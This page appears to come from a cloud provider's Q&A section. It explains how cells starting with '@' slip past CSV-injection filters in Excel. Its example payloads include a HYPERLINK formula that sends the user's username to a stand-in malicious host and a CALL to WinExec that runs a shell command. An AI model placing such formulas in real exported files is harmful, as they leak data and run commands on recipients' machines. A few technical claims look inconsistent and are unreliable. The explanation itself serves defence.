You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

关于@符号在Excel/CSV注入中的利用方式及防护检查必要性的技术问询

How the @ Symbol Enables Excel/CSV Injection Attacks

Great question! Let’s break down exactly why the @ symbol is a risk in Excel/CSV injection attacks, and why it needs to be included in your input sanitization checks.

1. Excel’s Automatic Formula Parsing for @-Prefixed Content

In modern Excel (365/2021 and later), the @ symbol acts as the implicit intersection operator—used to pull a single value from an array range. When importing a CSV file, Excel treats any cell starting with @ as a potential formula component. Crucially, it will automatically prepend an = sign to convert the entry into a valid formula: for example, a CSV cell with @A1 becomes =@A1 in Excel, which references the value in cell A1.

2. Bypassing Basic Injection Filters

Many applications only sanitize inputs starting with =, +, or - to block CSV injection. Attackers exploit this gap by using @ as an alternative trigger for formula execution. Here are concrete examples of malicious uses:

  • A CSV entry like @HYPERLINK("https://malicious-site.com/steal?user="&ENVIRON("USERNAME")) gets converted to =@HYPERLINK(...) in Excel. When the user interacts with the cell (or Excel renders it), it sends a request to the malicious site, leaking the user’s Windows username.
  • Stealthier attacks might use @SUM(INDEX(GET.WORKSPACE(13),1)) to fetch the user’s system username, then embed that data in a hidden WEBSERVICE call to exfiltrate it.

3. Combining @ with High-Risk Excel Functions

The @ operator can be paired with powerful (and dangerous) Excel functions to execute harmful actions, even if your system blocks =, +, or -:

  • @CALL("kernel32.dll","WinExec","JJ","cmd /c calc.exe"): While this requires relaxed Excel security settings, it shows how @ can initiate system command execution.
  • @CELL("filename",A1): Retrieves the full path of the current workbook, which can be leaked via a malicious hyperlink.

Why Sanitizing @ Is Critical

  • Filter Evasion: It’s a simple but effective way to bypass basic injection protection that only checks for =, +, -.
  • Seamless Execution: Excel converts @-prefixed cells to formulas automatically, no user action required—making attacks harder to spot.
  • Stealth: @ looks like a harmless, everyday symbol (think email addresses), so malicious entries are less likely to raise red flags with users or basic validation.

To mitigate this, add @ to your list of blocked prefixes, or escape it (e.g., prepend a single quote ' to force Excel to treat the cell as plain text instead of a formula).

内容的提问来源于stack exchange,提问作者Jeronimo

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.04.28 08:43:11